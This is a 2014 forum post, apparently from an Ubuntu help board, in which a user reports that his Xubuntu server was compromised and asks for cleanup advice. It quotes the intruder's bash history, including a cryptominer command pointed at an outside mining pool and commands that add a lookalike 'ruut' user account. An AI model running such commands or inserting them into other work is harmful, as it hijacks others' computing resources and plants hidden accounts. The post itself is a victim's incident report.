Xubuntu 12.04/64, OpenSSH Server Hacked
Last night I discovered a task on my Xubuntu 12.04/64 server (yes, conky is nice to have) as a process "m64.pl" used about 85-100% CPU time. After checking with everyone in my family I see the only option, I have got hacked, possibly through a Windows 7 computer since port 22 is closed in DSL router.
Here is bash history left by hacker :
chmod +x *
./m64.pl -o stratum+tcp://linuxpower.cf:3333 -u sebywarlord.1 -p miningltcs -B
sudo useradd ruut
su root useradd
To me it seems that someone has started a bitcoin task
What I have done is killing the process, remove files in /Public (had to do it in root as they where locked) and uninstall "OpenSSH Server".
Any suggestions on how to handle this would be most appreciated
Morten (Smiling after all)
Last edited by mbogevik; February 4th, 2014 at 07:54 PM.